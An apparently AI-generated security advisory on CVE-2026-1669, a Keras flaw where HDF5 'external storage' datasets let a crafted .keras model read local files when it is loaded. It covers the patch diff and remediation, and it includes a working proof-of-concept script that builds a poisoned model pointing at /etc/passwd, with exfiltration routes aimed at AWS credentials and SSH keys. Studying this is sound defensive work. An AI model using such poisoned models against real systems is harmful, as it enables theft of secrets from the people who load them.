CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-1669
7.10.04%

Model Poisoning: Turning Keras Weights into Weaponized File Readers

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 18, 2026·6 min read·11 visits

PoC Available

Executive Summary (TL;DR)

Keras blindly trusted HDF5 'external datasets' when loading models. Attackers can craft a .keras file where the model weights are actually pointers to local files on the victim's machine. When loaded, the model reads your secrets into memory as tensors.

A high-severity Arbitrary File Read vulnerability in the Keras machine learning library allows attackers to exfiltrate sensitive local files (like /etc/passwd or AWS credentials) by embedding 'External Storage' links within malicious HDF5 model files. This affects Keras versions 3.0.0 through 3.13.1.

The Trojan Horse in the Supply Chain

We live in an era where 'pip install' and 'model.load()' are typed with reckless abandon. Developers treat machine learning models like static assets—big bags of floating-point numbers that magically detect cats or translate French. But under the hood, the standard formats for these models are complex, structured filesystems. Keras, the high-level API that powers a massive chunk of the deep learning ecosystem, relies heavily on HDF5 (Hierarchical Data Format version 5) for saving and loading these weights.

Here is the problem: HDF5 isn't just a container for numbers; it's a feature-rich legacy format that supports everything from compression to complex object linking. One of those features is 'External Storage'—a mechanism designed to keep file sizes down by pointing a dataset to an external file on the disk rather than embedding the data.

CVE-2026-1669 is the classic story of a feature becoming a bug. By failing to validate these external links, Keras turned every load_model() call into a potential arbitrary file read primitive. If you are a security researcher, this is the kind of logic flaw you dream about: no memory corruption, no race conditions, just a polite request to the operating system to hand over its secrets.

The Mechanism: HDF5's Symlink from Hell

To understand this exploit, you have to understand how Keras uses h5py. When you save a model to .keras or .h5, Keras maps the neural network layers to HDF5 groups and the weights (kernels and biases) to HDF5 datasets. A dataset is usually a multidimensional array of numbers stored contiguously in the file.

However, the HDF5 specification allows a dataset to be 'contiguous', 'chunked', or 'external'. When a dataset is marked as external, the HDF5 header effectively says: "The data for this array isn't here. Go look in /etc/passwd at offset 0."

> [!NOTE] > This is not a bug in HDF5 or h5py. It is a documented feature for scientists who want to reference massive raw data files without duplicating them. The vulnerability lies entirely in Keras blindly assuming that every dataset it encounters is internal and safe.

The Keras loading logic iterates through the HDF5 structure, sees a dataset, and asks h5py to read it into a NumPy array. h5py, being a dutiful library, sees the external flag, resolves the path, opens the file, and reads the bytes. Keras then wraps those bytes in a Tensor and hands them to your GPU. Congratulations, your SSH private key is now a bias vector in a Dense layer.

The Code: Examining the Blind Spot

Let's look at the vulnerable code path in keras/src/saving/saving_lib.py (pre-3.13.2). The loader would recursively walk through the HDF5 groups. When it found a dataset, it simply accessed it. In Python's h5py, accessing a dataset behaves like reading an array—it triggers the I/O immediately.

The fix, introduced in commit 8a37f9d, is a masterclass in 'better late than never.' The maintainers introduced a centralized verification step _verify_dataset that explicitly checks the .external attribute of the HDF5 dataset object before allowing any data to be read.

Here is the critical diff:

# patched version of _verify_dataset
def _verify_dataset(self, dataset):
    if not isinstance(dataset, h5py.Dataset):
        raise ValueError(f"Expected Dataset, got {type(dataset)}")
    
    # THE FIX: Explicitly ban external links
    if dataset.external:
        raise ValueError(
            "Not allowed: H5 file Dataset with external links: "
            f"{dataset.external}"
        )
    return dataset

They also removed items() and values() methods from their H5WeightsStore class, forcing all access through __getitem__, which now includes this mandatory security check. It is a robust fix because it kills the vulnerability at the data-access layer, rather than trying to sanitize paths or restrict filenames.

The Exploit: Crafting the Poisoned Model

Exploiting this is trivially easy and requires no advanced binary exploitation skills. We just need to create a valid HDF5 file that defines a dataset pointing to a sensitive file. We can do this using standard Python libraries.

Imagine an attacker uploads a model to a public repository claiming to be the new state-of-the-art 'LLM-finetuner'. Here is how they build the trap:

import h5py
import numpy as np
 
# Target file we want to steal
target_file = '/etc/passwd'
# Or on Windows: 'C:\\Windows\\win.ini'
 
print(f"[*] Crafting malicious model pointing to {target_file}...")
 
with h5py.File('suspicious_model.keras', 'w') as f:
    # Create a dummy group structure Keras expects
    layer_group = f.create_group('layers')
    dense_group = layer_group.create_group('dense_1')
    
    # Define the 'external' list: (filename, offset, size)
    # h5py.h5f.UNLIMITED allows reading the whole file
    external_link = [(target_file, 0, h5py.h5f.UNLIMITED)]
    
    # Create the dataset. 
    # The shape must roughly match the file size or be large enough.
    # We use uint8 to read raw bytes.
    f.create_dataset('vars', shape=(2048,), dtype='uint8',
                     external=external_link)
 
print("[+] Malicious payload created.")

When the victim runs keras.models.load_model('suspicious_model.keras'), Keras will throw an error eventually because the file content (text) won't look like valid float32 weights for a neural network. However, by the time the error is thrown, the read has likely already occurred, or if the attacker is clever, they can map the file to a byte or string tensor which Keras might accept for certain metadata fields.

The Impact: From Read to Exfiltration

So the model reads /etc/passwd. How does the attacker get it? This is where the context matters. In a local attack, the data is just in memory. But consider a Machine Learning-as-a-Service (MLaaS) environment or a CI/CD pipeline.

  1. Inference Leaks: If the attacker can map the sensitive file to a weight used in the output layer, querying the model could return the file contents as the prediction result.
  2. Error Messages: Sometimes, validation errors print the 'invalid' values. If the value is the content of a configuration file, it appears in the logs.
  3. Side Channels: If the file size influences the model structure, it might crash the process in a measurable way, allowing an oracle attack to guess file existence.

The most dangerous scenario is a system that allows users to upload a model for fine-tuning or evaluation. The backend loads the model (reading the server's local secrets like AWS credentials from ~/.aws/credentials), and if the attacker can trigger a save or export of the model later, those 'external' bytes might be saved as 'internal' bytes in the new file, which the attacker then downloads.

Remediation: Patching the Hole

The remediation is straightforward: Update Keras to version 3.13.2 immediately. This version contains the dataset.external check that neutralizes the attack vector entirely.

If you cannot update (perhaps you are stuck on a legacy stack), you must treat all .keras and .h5 files as untrusted binaries. Do not load them outside of a sandboxed environment. You can also manually inspect files before loading using the h5dump command-line utility:

# Check for external storage configuration
h5dump -H malicious.keras | grep "EXTERNAL_FILE"

If that grep returns anything, delete the file and burn the hard drive (metaphorically speaking). This vulnerability serves as a stark reminder that 'data' formats are often code in disguise.

Official Patches

KerasPull Request #22057: Fix external dataset check

Fix Analysis (1)

Technical Appendix

CVSS Score
7.1/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
EPSS Probability
0.04%
Top 88% most exploited

Affected Systems

Keras 3.0.0Keras 3.1.0Keras 3.13.1Any Python application using Keras to load untrusted models

Affected Versions Detail

Product
Affected Versions
Fixed Version
Keras
Google
>= 3.0.0, < 3.13.23.13.2
AttributeDetail
CWE IDCWE-73 (External Control of File Name or Path)
CVSS v4.07.1 (High)
Attack VectorNetwork / Local
EPSS Score0.00039
Exploit MaturityProof of Concept (PoC)
Affected Componentkeras.src.saving.saving_lib

MITRE ATT&CK Mapping

T1005Data from Local System
Collection
T1552Unsecured Credentials
Credential Access
CWE-73
External Control of File Name or Path

The software allows user input to control or influence paths or file names that are used in filesystem operations.

Known Exploits & Detection

Giuseppe MassaroOriginal PoC demonstrating local file inclusion via HDF5 external storage.

Vulnerability Timeline

Patch merged into Keras main branch
2026-01-28
CVE Published
2026-02-11
PoC confirmed by researcher
2026-02-17

References & Sources

  • [1]NVD - CVE-2026-1669
  • [2]GitHub Security Advisory

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.